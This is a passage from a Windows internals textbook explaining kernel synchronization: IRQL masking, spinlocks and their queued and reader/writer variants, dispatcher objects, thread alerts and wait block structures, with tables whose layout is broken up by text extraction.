operation to synchronize access to data structures when the IRQL is
DPC/dispatch level or higher (levels known as an elevated or high IRQL). In
the following sections, you’ll find out how the kernel and executive use
mutual exclusion to protect their global data structures when the IRQL is
high and what mutual-exclusion and synchronization mechanisms the kernel
and executive use when the IRQL is low (below DPC/dispatch level).
High-IRQL synchronization
At various stages during its execution, the kernel must guarantee that one,
and only one, processor at a time is executing within a critical section. Kernel
critical sections are the code segments that modify a global data structure
such as the kernel’s dispatcher database or its DPC queue. The operating
system can’t function correctly unless the kernel can guarantee that threads
access these data structures in a mutually exclusive manner.
The biggest area of concern is interrupts. For example, the kernel might be
updating a global data structure when an interrupt occurs whose interrupt-
handling routine also modifies the structure. Simple single-processor
operating systems sometimes prevent such a scenario by disabling all
interrupts each time they access global data, but the Windows kernel has a
more sophisticated solution. Before using a global resource, the kernel
temporarily masks the interrupts whose interrupt handlers also use the
resource. It does so by raising the processor’s IRQL to the highest level used
by any potential interrupt source that accesses the global data. For example,
an interrupt at DPC/dispatch level causes the dispatcher, which uses the
dispatcher database, to run. Therefore, any other part of the kernel that uses
the dispatcher database raises the IRQL to DPC/dispatch level, masking
DPC/dispatch-level interrupts before using the dispatcher database.
This strategy is fine for a single-processor system, but it’s inadequate for a
multiprocessor configuration. Raising the IRQL on one processor doesn’t
prevent an interrupt from occurring on another processor. The kernel also
needs to guarantee mutually exclusive access across several processors.
Interlocked operations
The simplest form of synchronization mechanisms relies on hardware support
for multiprocessor-safe manipulation of integer values and for performing
comparisons. They include functions such as InterlockedIncrement,
InterlockedDecrement, InterlockedExchange, and
InterlockedCompareExchange. The InterlockedDecrement function, for
example, uses the x86 and x64 lock instruction prefix (for example, lock
xadd) to lock the multiprocessor bus during the addition operation so that
another processor that’s also modifying the memory location being
decremented won’t be able to modify it between the decrementing
processor’s read of the original value and its write of the decremented value.
This form of basic synchronization is used by the kernel and drivers. In
today’s Microsoft compiler suite, these functions are called intrinsic because
the code for them is generated in an inline assembler, directly during the
compilation phase, instead of going through a function call (it’s likely that
pushing the parameters onto the stack, calling the function, copying the
parameters into registers, and then popping the parameters off the stack and
returning to the caller would be a more expensive operation than the actual
work the function is supposed to do in the first place.)
Spinlocks
The mechanism the kernel uses to achieve multiprocessor mutual exclusion is
called a spinlock. A spinlock is a locking primitive associated with a global
data structure, such as the DPC queue shown in Figure 8-38.
Figure 8-38 Using a spinlock.
Before entering either critical section shown in Figure 8-38, the kernel
must acquire the spinlock associated with the protected DPC queue. If the
spinlock isn’t free, the kernel keeps trying to acquire the lock until it
succeeds. The spinlock gets its name from the fact that the kernel (and thus,
the processor) waits, “spinning,” until it gets the lock.
Spinlocks, like the data structures they protect, reside in nonpaged memory
mapped into the system address space. The code to acquire and release a
spinlock is written in assembly language for speed and to exploit whatever
locking mechanism the underlying processor architecture provides. On many
architectures, spinlocks are implemented with a hardware-supported test-and-
set operation, which tests the value of a lock variable and acquires the lock in
one atomic instruction. Testing and acquiring the lock in one instruction
prevents a second thread from grabbing the lock between the time the first
thread tests the variable and the time it acquires the lock. Additionally, a
hardware instruction such the lock instruction mentioned earlier can also be
used on the test-and-set operation, resulting in the combined lock bts opcode
on x86 and x64 processors, which also locks the multiprocessor bus;
otherwise, it would be possible for more than one processor to perform the
operation atomically. (Without the lock, the operation is guaranteed to be
atomic only on the current processor.) Similarly, on ARM processors,
instructions such as ldrex and strex can be used in a similar fashion.
All kernel-mode spinlocks in Windows have an associated IRQL that is
always DPC/dispatch level or higher. Thus, when a thread is trying to acquire
a spinlock, all other activity at the spinlock’s IRQL or lower ceases on that
processor. Because thread dispatching happens at DPC/dispatch level, a
thread that holds a spinlock is never preempted because the IRQL masks the
dispatching mechanisms. This masking allows code executing in a critical
section protected by a spinlock to continue executing so that it will release
the lock quickly. The kernel uses spinlocks with great care, minimizing the
number of instructions it executes while it holds a spinlock. Any processor
that attempts to acquire the spinlock will essentially be busy, waiting
indefinitely, consuming power (a busy wait results in 100% CPU usage) and
performing no actual work.
On x86 and x64 processors, a special pause assembly instruction can be
inserted in busy wait loops, and on ARM processors, yield provides a similar
benefit. This instruction offers a hint to the processor that the loop
instructions it is processing are part of a spinlock (or a similar construct)
acquisition loop. The instruction provides three benefits:
■ It significantly reduces power usage by delaying the core ever so
slightly instead of continuously looping.
■ On SMT cores, it allows the CPU to realize that the “work” being
done by the spinning logical core is not terribly important and awards
more CPU time to the second logical core instead.
■ Because a busy wait loop results in a storm of read requests coming to
the bus from the waiting thread (which might be generated out of
order), the CPU attempts to correct for violations of memory order as
soon as it detects a write (that is, when the owning thread releases the
lock). Thus, as soon as the spinlock is released, the CPU reorders any
pending memory read operations to ensure proper ordering. This
reordering results in a large penalty in system performance and can be
avoided with the pause instruction.
If the kernel detects that it is running under a Hyper-V compatible
hypervisor, which supports the spinlock enlightenment (described in
Chapter 9), the spinlock facility can use the HvlNotifyLongSpinWait
library function when it detects that the spinlock is currently owned
by another CPU, instead of contiguously spinning and use the pause
instruction. The function emits a HvCallNotifyLongSpinWait
hypercall to indicate to the hypervisor scheduler that another VP
should take over instead of emulating the spin.
The kernel makes spinlocks available to other parts of the executive
through a set of kernel functions, including KeAcquireSpinLock and
KeReleaseSpinLock. Device drivers, for example, require spinlocks to
guarantee that device registers and other global data structures are accessed
by only one part of a device driver (and from only one processor) at a time.
Spinlocks are not for use by user programs—user programs should use the
objects described in the next section. Device drivers also need to protect
access to their own data structures from interrupts associated with
themselves. Because the spinlock APIs typically raise the IRQL only to
DPC/dispatch level, this isn’t enough to protect against interrupts. For this
reason, the kernel also exports the KeAcquireInterruptSpinLock and
KeReleaseInterruptSpinLock APIs that take as a parameter the
KINTERRUPT object discussed at the beginning of this chapter. The system
looks inside the interrupt object for the associated DIRQL with the interrupt
and raises the IRQL to the appropriate level to ensure correct access to
structures shared with the ISR.
Devices can also use the KeSynchronizeExecution API to synchronize an
entire function with an ISR instead of just a critical section. In all cases, the
code protected by an interrupt spinlock must execute extremely quickly—any
delay causes higher-than-normal interrupt latency and will have significant
negative performance effects.
Kernel spinlocks carry with them restrictions for code that uses them.
Because spinlocks always have an IRQL of DPC/dispatch level or higher, as
explained earlier, code holding a spinlock will crash the system if it attempts
to make the scheduler perform a dispatch operation or if it causes a page
fault.
Queued spinlocks
To increase the scalability of spinlocks, a special type of spinlock, called a
queued spinlock, is used in many circumstances instead of a standard
spinlock, especially when contention is expected, and fairness is required.
A queued spinlock works like this: When a processor wants to acquire a
queued spinlock that is currently held, it places its identifier in a queue
associated with the spinlock. When the processor that’s holding the spinlock
releases it, it hands the lock over to the next processor identified in the queue.
In the meantime, a processor waiting for a busy spinlock checks the status
not of the spinlock itself but of a per-processor flag that the processor ahead
of it in the queue sets to indicate that the waiting processor’s turn has arrived.
The fact that queued spinlocks result in spinning on per-processor flags
rather than global spinlocks has two effects. The first is that the
multiprocessor’s bus isn’t as heavily trafficked by interprocessor
synchronization, and the memory location of the bit is not in a single NUMA
node that then has to be snooped through the caches of each logical
processor. The second is that instead of a random processor in a waiting
group acquiring a spinlock, the queued spinlock enforces first-in, first-out
(FIFO) ordering to the lock. FIFO ordering means more consistent
performance (fairness) across processors accessing the same locks. While the
reduction in bus traffic and increase in fairness are great benefits, queued
spinlocks do require additional overhead, including extra interlocked
operations, which do add their own costs. Developers must carefully balance
the management overheard with the benefits to decide if a queued spinlock is
worth it for them.
Windows uses two different types of queued spinlocks. The first are
internal to the kernel only, while the second are available to external and
third-party drivers as well. First, Windows defines a number of global
queued spinlocks by storing pointers to them in an array contained in each
processor’s processor control region (PCR). For example, on x64 systems,
these are stored in the LockArray field of the KPCR data structure.
A global spinlock can be acquired by calling KeAcquireQueuedSpinLock
with the index into the array at which the pointer to the spinlock is stored.
The number of global spinlocks originally grew in each release of the
operating system, but over time, more efficient locking hierarchies were used
that do not require global per-processor locking. You can view the table of
index definitions for these locks in the WDK header file Wdm.h under the
KSPIN_LOCK_QUEUE_NUMBER enumeration, but note, however, that
acquiring one of these queued spinlocks from a device driver is an
unsupported and heavily frowned-upon operation. As we said, these locks are
reserved for the kernel’s internal use.
EXPERIMENT: Viewing global queued spinlocks
You can view the state of the global queued spinlocks (the ones
pointed to by the queued spinlock array in each processor’s PCR)
by using the !qlocks kernel debugger command. In the following
example, note that none of the locks are acquired on any of the
processors, which is a standard situation on a local system doing
live debugging.
Click here to view code image
lkd> !qlocks
Key: O = Owner, 1-n = Wait order, blank = not owned/waiting,
C = Corrupt
Processor Number
Lock Name 0 1 2 3 4 5 6 7
KE - Unused Spare
MM - Unused Spare
MM - Unused Spare
MM - Unused Spare
CC - Vacb
CC - Master
EX - NonPagedPool
IO - Cancel
CC - Unused Spare
In-stack queued spinlocks
Device drivers can use dynamically allocated queued spinlocks with the
KeAcquireInStackQueued SpinLock and KeReleaseInStackQueuedSpinLock
functions. Several components—including the cache manager, executive pool
manager, and NTFS—take advantage of these types of locks instead of using
global queued spinlocks.
KeAcquireInStackQueuedSpinLock takes a pointer to a spinlock data
structure and a spinlock queue handle. The spinlock queue handle is actually
a data structure in which the kernel stores information about the lock’s status,
including the lock’s ownership and the queue of processors that might be
waiting for the lock to become available. For this reason, the handle
shouldn’t be a global variable. It is usually a stack variable, guaranteeing
locality to the caller thread and is responsible for the InStack part of the
spinlock and API name.
Reader/writer spin locks
While using queued spinlocks greatly improves latency in highly contended
situations, Windows supports another kind of spinlock that can offer even
greater benefits by potentially eliminating contention in many situations to
begin with. The multi-reader, single-writer spinlock, also called the executive
spinlock, is an enhancement on top of regular spinlocks, which is exposed
through the ExAcquireSpinLockExclusive, ExAcquireSpinLockShared API,
and their ExReleaseXxx counterparts. Additionally,
ExTryAcquireSpinLockSharedAtDpcLevel and
ExTryConvertSharedSpinLockToExclusive functions exist for more advanced
use cases.
As the name suggests, this type of lock allows noncontended shared
acquisition of a spinlock if no writer is present. When a writer is interested in
the lock, readers must eventually release the lock, and no further readers will
be allowed while the writer is active (nor additional writers). If a driver
developer often finds themself iterating over a linked list, for example, while
only rarely inserting or removing items, this type of lock can remove
contention in the majority of cases, removing the need for the complexity of
a queued spinlock.
Executive interlocked operations
The kernel supplies some simple synchronization functions constructed on
spinlocks for more advanced operations, such as adding and removing entries
from singly and doubly linked lists. Examples include
ExInterlockedPopEntryList and ExInterlockedPushEntryList for singly linked
lists, and ExInterlockedInsertHeadList and ExInterlockedRemoveHeadList for
doubly linked lists. A few other functions, such as ExInterlockedAddUlong
and ExInterlockedAddLargeInteger also exist. All these functions require a
standard spinlock as a parameter and are used throughout the kernel and
device drivers’ code.
Instead of relying on the standard APIs to acquire and release the spinlock
parameter, these functions place the code required inline and also use a
different ordering scheme. Whereas the Ke spinlock APIs first test and set the
bit to see whether the lock is released and then atomically perform a locked
test-and-set operation to make the acquisition, these routines disable
interrupts on the processor and immediately attempt an atomic test-and-set. If
the initial attempt fails, interrupts are enabled again, and the standard busy
waiting algorithm continues until the test-and-set operation returns 0—in
which case the whole function is restarted again. Because of these subtle
differences, a spinlock used for the executive interlocked functions must not
be used with the standard kernel APIs discussed previously. Naturally,
noninterlocked list operations must not be mixed with interlocked operations.
Note
Certain executive interlocked operations silently ignore the spinlock when
possible. For example, the ExInterlockedIncrementLong or
ExInterlockedCompareExchange APIs use the same lock prefix used by
the standard interlocked functions and the intrinsic functions. These
functions were useful on older systems (or non-x86 systems) where the
lock operation was not suitable or available. For this reason, these calls
are now deprecated and are silently inlined in favor of the intrinsic
functions.
Low-IRQL synchronization
Executive software outside the kernel also needs to synchronize access to
global data structures in a multiprocessor environment. For example, the
memory manager has only one page frame database, which it accesses as a
global data structure, and device drivers need to ensure that they can gain
exclusive access to their devices. By calling kernel functions, the executive
can create a spinlock, acquire it, and release it.
Spinlocks only partially fill the executive’s needs for synchronization
mechanisms, however. Because waiting for a spinlock literally stalls a
processor, spinlocks can be used only under the following strictly limited
circumstances:
■ The protected resource must be accessed quickly and without
complicated interactions with other code.
■ The critical section code can’t be paged out of memory, can’t make
references to pageable data, can’t call external procedures (including
system services), and can’t generate interrupts or exceptions.
These restrictions are confining and can’t be met under all circumstances.
Furthermore, the executive needs to perform other types of synchronization
in addition to mutual exclusion, and it must also provide synchronization
mechanisms to user mode.
There are several additional synchronization mechanisms for use when
spinlocks are not suitable:
■ Kernel dispatcher objects (mutexes, semaphores, events, and timers)
■ Fast mutexes and guarded mutexes
■ Pushlocks
■ Executive resources
■ Run-once initialization (InitOnce)
Additionally, user-mode code, which also executes at low IRQL, must be
able to have its own locking primitives. Windows supports various user-
mode-specific primitives:
■ System calls that refer to kernel dispatcher objects (mutants,
semaphores, events, and timers)
■ Condition variables (CondVars)
■ Slim Reader-Writer Locks (SRW Locks)
■ Address-based waiting
■ Run-once initialization (InitOnce)
■ Critical sections
We look at the user-mode primitives and their underlying kernel-mode
support later; for now, we focus on kernel-mode objects. Table 8-26
compares and contrasts the capabilities of these mechanisms and their
interaction with kernel-mode APC delivery.
Table 8-26 Kernel synchronization mechanisms
Expose
d for
Use by
Device
Drivers
Disables
Normal
Kernel-
Mode
APCs
Disables
Special
Kernel-
Mode
APCs
Suppor
ts
Recurs
ive
Acquis
Supports
Shared
and
Exclusive
Acquisitio
ition
n
Kernel
dispatcher
mutexes
Yes
Yes
No
Yes
No
Kernel
dispatcher
semaphore
s, events,
timers
Yes
No
No
No
No
Fast
mutexes
Yes
Yes
Yes
No
No
Guarded
mutexes
Yes
Yes
Yes
No
No
Pushlocks
Yes
No
No
No
Yes
Executive
resources
Yes
No
No
Yes
Yes
Rundown
protections
Yes
No
No
Yes
No
Kernel dispatcher objects
The kernel furnishes additional synchronization mechanisms to the executive
in the form of kernel objects, known collectively as dispatcher objects. The
Windows API-visible synchronization objects acquire their synchronization
capabilities from these kernel dispatcher objects. Each Windows API-visible
object that supports synchronization encapsulates at least one kernel
dispatcher object. The executive’s synchronization semantics are visible to
Windows programmers through the WaitForSingleObject and
WaitForMultipleObjects functions, which the Windows subsystem
implements by calling analogous system services that the Object Manager
supplies. A thread in a Windows application can synchronize with a variety
of objects, including a Windows process, thread, event, semaphore, mutex,
waitable timer, I/O completion port, ALPC port, registry key, or file object.
In fact, almost all objects exposed by the kernel can be waited on. Some of
these are proper dispatcher objects, whereas others are larger objects that
have a dispatcher object within them (such as ports, keys, or files). Table 8-
27 (later in this chapter in the section “What signals an object?”) shows the
proper dispatcher objects, so any other object that the Windows API allows
waiting on probably internally contains one of those primitives.
Table 8-27 Definitions of the signaled state
Object
Type
Set to Signaled
State When
Effect on Waiting Threads
Process
Last thread
terminates.
All are released.
Thread
Thread
terminates.
All are released.
Event
(notificatio
n type)
Thread sets the
event.
All are released.
Event
(synchroni
zation
type)
Thread sets the
event.
One thread is released and might
receive a boost; the event object is
reset.
Gate
Thread signals
First waiting thread is released and
(locking
type)
the gate.
receives a boost.
Gate
(signaling
type)
Thread signals
the type.
First waiting thread is released.
Keyed
event
Thread sets
event with a
key.
Thread that’s waiting for the key and
which is of the same process as the
signaler is released.
Semaphore
Semaphore
count drops by
1.
One thread is released.
Timer
(notificatio
n type)
Set time arrives
or time interval
expires.
All are released.
Timer
(synchroni
zation
type)
Set time arrives
or time interval
expires.
One thread is released.
Mutex
Thread releases
the mutex.
One thread is released and takes
ownership of the mutex.
Queue
Item is placed
on queue.
One thread is released.
Two other types of executive synchronization mechanisms worth noting
are the executive resource and the pushlock. These mechanisms provide
exclusive access (like a mutex) as well as shared read access (multiple
readers sharing read-only access to a structure). However, they’re available
only to kernel-mode code and thus are not accessible from the Windows API.
They’re also not true objects—they have an API exposed through raw
pointers and Ex APIs, and the Object Manager and its handle system are not
involved. The remaining subsections describe the implementation details of
waiting for dispatcher objects.
Waiting for dispatcher objects
The traditional way that a thread can synchronize with a dispatcher object is
by waiting for the object’s handle, or, for certain types of objects, directly
waiting on the object’s pointer. The NtWaitForXxx class of APIs (which is
also what’s exposed to user mode) works with handles, whereas the
KeWaitForXxx APIs deal directly with the dispatcher object.
Because the Nt API communicates with the Object Manager
(ObWaitForXxx class of functions), it goes through the abstractions that were
explained in the section on object types earlier in this chapter. For example,
the Nt API allows passing in a handle to a File Object, because the Object
Manager uses the information in the object type to redirect the wait to the
Event field inside of FILE_OBJECT. The Ke API, on the other hand, only
works with true dispatcher objects—that is to say, those that begin with a
DISPATCHER_HEADER structure. Regardless of the approach taken, these
calls ultimately cause the kernel to put the thread in a wait state.
A completely different, and more modern, approach to waiting on
dispatcher objects is to rely on asynchronous waiting. This approach
leverages the existing I/O completion port infrastructure to associate a
dispatcher object with the kernel queue backing the I/O completion port, by
going through an intermediate object called a wait completion packet. Thanks
to this mechanism, a thread essentially registers a wait but does not directly
block on the dispatcher object and does not enter a wait state. Instead, when
the wait is satisfied, the I/O completion port will have the wait completion
packet inserted, acting as a notification for anyone who is pulling items from,
or waiting on, the I/O completion port. This allows one or more threads to
register wait indications on various objects, which a separate thread (or pool
of threads) can essentially wait on. As you’ve probably guessed, this
mechanism is the linchpin of the Thread Pool API’s functionality supporting
wait callbacks, in APIs such as CreateThreadPoolWait and
SetThreadPoolWait.
Finally, an extension of the asynchronous waiting mechanism was built
into more recent builds of Windows 10, through the DPC Wait Event
functionality that is currently reserved for Hyper-V (although the API is
exported, it is not yet documented). This introduces a final approach to
dispatcher waits, reserved for kernel-mode drivers, in which a deferred
procedure call (DPC, explained earlier in this chapter) can be associated with
a dispatcher object, instead of a thread or I/O completion port. Similar to the
mechanism described earlier, the DPC is registered with the object, and
when the wait is satisfied, the DPC is then queued into the current
processor’s queue (as if the driver had now just called KeInsertQueueDpc).
When the dispatcher lock is dropped and the IRQL returns below
DISPATCH_LEVEL, the DPC executes on the current processor, which is the
driver-supplied callback that can now react to the signal state of the object.
Irrespective of the waiting mechanism, the synchronization object(s) being
waited on can be in one of two states: signaled state or nonsignaled state. A
thread can’t resume its execution until its wait is satisfied, a condition that
occurs when the dispatcher object whose handle the thread is waiting for also
undergoes a state change, from the nonsignaled state to the signaled state
(when another thread sets an event object, for example).
To synchronize with an object, a thread calls one of the wait system
services that the Object Manager supplies, passing a handle to the object it
wants to synchronize with. The thread can wait for one or several objects and
can also specify that its wait should be canceled if it hasn’t ended within a
certain amount of time. Whenever the kernel sets an object to the signaled
state, one of the kernel’s signal routines checks to see whether any threads
are waiting for the object and not also waiting for other objects to become
signaled. If there are, the kernel releases one or more of the threads from
their waiting state so that they can continue executing.
To be asynchronously notified of an object becoming signaled, a thread
creates an I/O completion port, and then calls
NtCreateWaitCompletionPacket to create a wait completion packet object
and receive a handle back to it. Then, it calls
NtAssociateWaitCompletionPacket, passing in both the handle to the I/O
completion port as well as the handle to the wait completion packet it just
created, combined with a handle to the object it wants to be notified about.
Whenever the kernel sets an object to the signaled state, the signal routines
realize that no thread is currently waiting on the object, and instead check
whether an I/O completion port has been associated with the wait. If so, it
signals the queue object associated with the port, which causes any threads
currently waiting on it to wake up and consume the wait completion packet
(or, alternatively, the queue simply becomes signaled until a thread comes in
and attempts to wait on it). Alternatively, if no I/O completion port has been
associated with the wait, then a check is made to see whether a DPC is
associated instead, in which case it will be queued on the current processor.
This part handles the kernel-only DPC Wait Event mechanism described
earlier.
The following example of setting an event illustrates how synchronization
interacts with thread dispatching:
■ A user-mode thread waits for an event object’s handle.
■ The kernel changes the thread’s scheduling state to waiting and then
adds the thread to a list of threads waiting for the event.
■ Another thread sets the event.
■ The kernel marches down the list of threads waiting for the event. If a
thread’s conditions for waiting are satisfied (see the following note),
the kernel takes the thread out of the waiting state. If it is a variable-
priority thread, the kernel might also boost its execution priority. (For
details on thread scheduling, see Chapter 4 of Part 1.)
Note
Some threads might be waiting for more than one object, so they continue
waiting, unless they specified a WaitAny wait, which will wake them up
as soon as one object (instead of all) is signaled.
What signals an object?
The signaled state is defined differently for different objects. A thread object
is in the nonsignaled state during its lifetime and is set to the signaled state by
the kernel when the thread terminates. Similarly, the kernel sets a process
object to the signaled state when the process’s last thread terminates. In
contrast, the timer object, like an alarm, is set to “go off” at a certain time.
When its time expires, the kernel sets the timer object to the signaled state.
When choosing a synchronization mechanism, a programmer must take
into account the rules governing the behavior of different synchronization
objects. Whether a thread’s wait ends when an object is set to the signaled
state varies with the type of object the thread is waiting for, as Table 8-27
illustrates.
When an object is set to the signaled state, waiting threads are generally
released from their wait states immediately.
For example, a notification event object (called a manual reset event in the
Windows API) is used to announce the occurrence of some event. When the
event object is set to the signaled state, all threads waiting for the event are
released. The exception is any thread that is waiting for more than one object
at a time; such a thread might be required to continue waiting until additional
objects reach the signaled state.
In contrast to an event object, a mutex object has ownership associated
with it (unless it was acquired during a DPC). It is used to gain mutually
exclusive access to a resource, and only one thread at a time can hold the
mutex. When the mutex object becomes free, the kernel sets it to the signaled
state and then selects one waiting thread to execute, while also inheriting any
priority boost that had been applied. (See Chapter 4 of Part 1 for more
information on priority boosting.) The thread selected by the kernel acquires
the mutex object, and all other threads continue waiting.
A mutex object can also be abandoned, something that occurs when the
thread currently owning it becomes terminated. When a thread terminates,
the kernel enumerates all mutexes owned by the thread and sets them to the
abandoned state, which, in terms of signaling logic, is treated as a signaled
state in that ownership of the mutex is transferred to a waiting thread.
This brief discussion wasn’t meant to enumerate all the reasons and
applications for using the various executive objects but rather to list their
basic functionality and synchronization behavior. For information on how to
put these objects to use in Windows programs, see the Windows reference
documentation on synchronization objects or Jeffrey Richter and Christophe
Nasarre’s book Windows via C/C++ from Microsoft Press.
Object-less waiting (thread alerts)
While the ability to wait for, or be notified about, an object becoming
signaled is extremely powerful, and the wide variety of dispatcher objects at
programmers’ disposal is rich, sometimes a much simpler approach is
needed. One thread wants to wait for a specific condition to occur, and
another thread needs to signal the occurrence of the condition. Although this
can be achieved by tying an event to the condition, this requires resources
(memory and handles, to name a couple), and acquisition and creation of
resources can fail while also taking time and being complex. The Windows
kernel provides two mechanisms for synchronization that are not tied to
dispatcher objects:
■ Thread alerts
■ Thread alert by ID
Although their names are similar, the two mechanisms work in different
ways. Let’s look at how thread alerts work. First, the thread wishing to
synchronize enters an alertable sleep by using SleepEx (ultimately resulting
in NtDelayExecutionThread). A kernel thread could also choose to use
KeDelayExecutionThread. We previously explained the concept of
alertability earlier in the section on software interrupts and APCs. In this
case, the thread can either specify a timeout value or make the sleep infinite.
Secondly, the other side uses the NtAlertThread (or KeAlertThread) API to
alert the thread, which causes the sleep to abort, returning the status code
STATUS_ALERTED. For the sake of completeness, it’s also worth noting that
a thread can choose not to enter an alertable sleep state, but instead, at a later
time of its choosing, call the NtTestAlert (or KeTestAlertThread) API.
Finally, a thread could also avoid entering an alertable wait state by
suspending itself instead (NtSuspendThread or KeSuspendThread). In this
case, the other side can use NtAlertResumeThread to both alert the thread and
then resume it.
Although this mechanism is elegant and simple, it does suffer from a few
issues, beginning with the fact that there is no way to identify whether the
alert was the one related to the wait—in other words, any other thread
could’ve also alerted the waiting thread, which has no way of distinguishing
between the alerts. Second, the alert API is not officially documented—
meaning that while internal kernel and user services can leverage this
mechanism, third-party developers are not meant to use alerts. Third, once a
thread becomes alerted, any pending queued APCs also begin executing—
such as user-mode APCs if these alert APIs are used by applications. And
finally, NtAlertThread still requires opening a handle to the target thread—an
operation that technically counts as acquiring a resource, an operation which
can fail. Callers could theoretically open their handles ahead of time,
guaranteeing that the alert will succeed, but that still does add the cost of a
handle in the whole mechanism.
To respond to these issues, the Windows kernel received a more modern
mechanism starting with Windows 8, which is the alert by ID. Although the
system calls behind this mechanism—NtAlertThreadByThreadId and
NtWaitForAlertByThreadId—are not documented, the Win32 user-mode
wait API that we describe later is. These system calls are extremely simple
and require zero resources, using only the Thread ID as input. Of course,
since without a handle, this could be a security issue, the one disadvantage to
these APIs is that they can only be used to synchronize with threads within
the current process.
Explaining the behavior of this mechanism is fairly obvious: first, the
thread blocks with the NtWaitForAlertByThreadId API, passing in an
optional timeout. This makes the thread enter a real wait, without alertability
being a concern. In fact, in spite of the name, this type of wait is non-
alertable, by design. Next, the other thread calls the
NtAlertThreadByThreadId API, which causes the kernel to look up the
Thread ID, make sure it belongs to the calling process, and then check
whether the thread is indeed blocking on a call to
NtWaitForAlertByThreadId. If the thread is in this state, it’s simply woken
up. This simple, elegant mechanism is the heart of a number of user-mode
synchronization primitives later in this chapter and can be used to implement
anything from barriers to more complex synchronization methods.
Data structures
Three data structures are key to tracking who is waiting, how they are
waiting, what they are waiting for, and which state the entire wait operation is
at. These three structures are the dispatcher header, the wait block, and the
wait status register. The former two structures are publicly defined in the
WDK include file Wdm.h, whereas the latter is not documented but is visible
in public symbols with the type KWAIT_STATUS_REGISTER (and the Flags
field corresponds to the KWAIT_STATE enumeration).
The dispatcher header is a packed structure because it needs to hold a lot
of information in a fixed-size structure. (See the upcoming “EXPERIMENT:
Looking at wait queues” section to see the definition of the dispatcher header
data structure.) One of the main techniques used in its definition is to store
mutually exclusive flags at the same memory location (offset) in the
structure, which is called a union in programming theory. By using the Type
field, the kernel knows which of these fields is relevant. For example, a
mutex can be Abandoned, but a timer can be Relative. Similarly, a timer can
be Inserted into the timer list, but debugging can only be Active for a process.
Outside of these specific fields, the dispatcher header also contains
information that’s meaningful regardless of the dispatcher object: the
Signaled state and the Wait List Head for the wait blocks associated with the
object.
These wait blocks are what represents that a thread (or, in the case of
asynchronous waiting, an I/O completion port) is tied to an object. Each
thread that is in a wait state has an array of up to 64 wait blocks that
represent the object(s) the thread is waiting for (including, potentially, a wait
block pointing to the internal thread timer that’s used to satisfy a timeout that
the caller may have specified). Alternatively, if the alert-by-ID primitives are
used, there is a single block with a special indication that this is not a
dispatcher-based wait. The Object field is replaced by a Hint that is specified
by the caller of NtWaitForAlertByThreadId. This array is maintained for two
main purposes:
■ When a thread terminates, all objects that it was waiting on must be
dereferenced, and the wait blocks deleted and disconnected from the
object(s).
■ When a thread is awakened by one of the objects it’s waiting on (that
is, by becoming signaled and satisfying the wait), all the other objects
it may have been waiting on must be dereferenced and the wait blocks
deleted and disconnected.
Just like a thread has this array of all the objects it’s waiting on, as we
mentioned just a bit earlier, each dispatcher object also has a linked list of
wait blocks tied to it. This list is kept so that when a dispatcher object is
signaled, the kernel can quickly determine who is waiting on (or which I/O
completion port is tied to) that object and apply the wait satisfaction logic we
explain shortly.
Finally, because the balance set manager thread running on each CPU (see
Chapter 5 of Part 1 for more information about the balance set manager)
needs to analyze the time that each thread has been waiting for (to decide
whether to page out the kernel stack), each PRCB has a list of eligible
waiting threads that last ran on that processor. This reuses the Ready List
field of the KTHREAD structure because a thread can’t both be ready and
waiting at the same time. Eligible threads must satisfy the following three
conditions:
■ The wait must have been issued with a wait mode of UserMode
(KernelMode waits are assumed to be time-sensitive and not worth
the cost of stack swapping).
■ The thread must have the EnableStackSwap flag set (kernel drivers
can disable this with the KeSetKernelStackSwapEnable API).
■ The thread’s priority must be at or below the Win32 real-time priority
range start (24—the default for a normal thread in the “real-time”
process priority class).
The structure of a wait block is always fixed, but some of its fields are
used in different ways depending on the type of wait. For example, typically,
the wait block has a pointer to the object being waited on, but as we pointed
out earlier, for an alert-by-ID wait, there is no object involved, so this
represents the Hint that was specified by the caller. Similarly, while a wait
block usually points back to the thread waiting on the object, it can also point
to the queue of an I/O completion port, in the case where a wait completion
packet was associated with the object as part of an asynchronous wait.
Two fields that are always maintained, however, are the wait type and the
wait block state, and, depending on the type, a wait key can also be present.
The wait type is very important during wait satisfaction because it determines
which of the five possible types of satisfaction regimes to use: for a wait any,
the kernel does not care about the state of any other object because at least
one of them (the current one!) is now signaled. On the other hand, for a wait
all, the kernel can only wake the thread if all the other objects are also in a
signaled state at the same time, which requires iterating over the wait blocks
and their associated objects.
Alternatively, a wait dequeue is a specialized case for situations where the
dispatcher object is actually a queue (I/O completion port), and there is a
thread waiting on it to have completion packets available (by calling
KeRemoveQueue(Ex) or (Nt)IoRemoveIoCompletion). Wait blocks attached
to queues function in a LIFO wake order (instead of FIFO like other
dispatcher objects), so when a queue is signaled, this allows the correct
actions to be taken (keep in mind that a thread could be waiting on multiple
objects, so it could have other wait blocks, in a wait any or wait all state, that
must still be handled regularly).
For a wait notification, the kernel knows that no thread is associated with
the object at all and that this is an asynchronous wait with an associated I/O
completion port whose queue will be signaled. (Because a queue is itself a
dispatcher object, this causes a second order wait satisfaction for the queue
and any threads potentially waiting on it.)
Finally, a wait DPC, which is the newest wait type introduced, lets the
kernel know that there is no thread nor I/O completion port associated with
this wait, but a DPC object instead. In this case, the pointer is to an initialized
KDPC structure, which the kernel queues on the current processor for nearly
immediate execution once the dispatcher lock is dropped.
The wait block also contains a volatile wait block state
(KWAIT_BLOCK_STATE) that defines the current state of this wait block in
the transactional wait operation it is currently engaged in. The different
states, their meaning, and their effects in the wait logic code are explained in
Table 8-28.
Table 8-28 Wait block states
St
at
e
Meaning
Effect
W
ait
Bl
oc
kA
cti
ve
(4)
This wait block is
actively linked to
an object as part of
a thread that is in a
wait state.
During wait satisfaction, this wait block
will be unlinked from the wait block list.
W
ait
Bl
oc
kI
na
cti
ve
(5)
The thread wait
associated with this
wait block has been
satisfied (or the
timeout has already
expired while
setting it up).
During wait satisfaction, this wait block
will not be unlinked from the wait block list
because the wait satisfaction must have
already unlinked it during its active state.
W
ait
Bl
oc
The thread
associated with this
wait block is
undergoing a
Essentially treated the same as
WaitBlockActive but only ever used when
resuming a thread. Ignored during regular
wait satisfaction (should never be seen, as
kS
us
pe
nd
ed
(6)
lightweight suspend
operation.
suspended threads can’t be waiting on
something too!).
W
ait
Bl
oc
kB
yp
as
sSt
art
(0)
A signal is being
delivered to the
thread while the
wait has not yet
been committed.
During wait satisfaction (which would be
immediate, before the thread enters the true
wait state), the waiting thread must
synchronize with the signaler because there
is a risk that the wait object might be on the
stack—marking the wait block as inactive
would cause the waiter to unwind the stack
while the signaler might still be accessing
it.
W
ait
Bl
oc
kB
yp
as
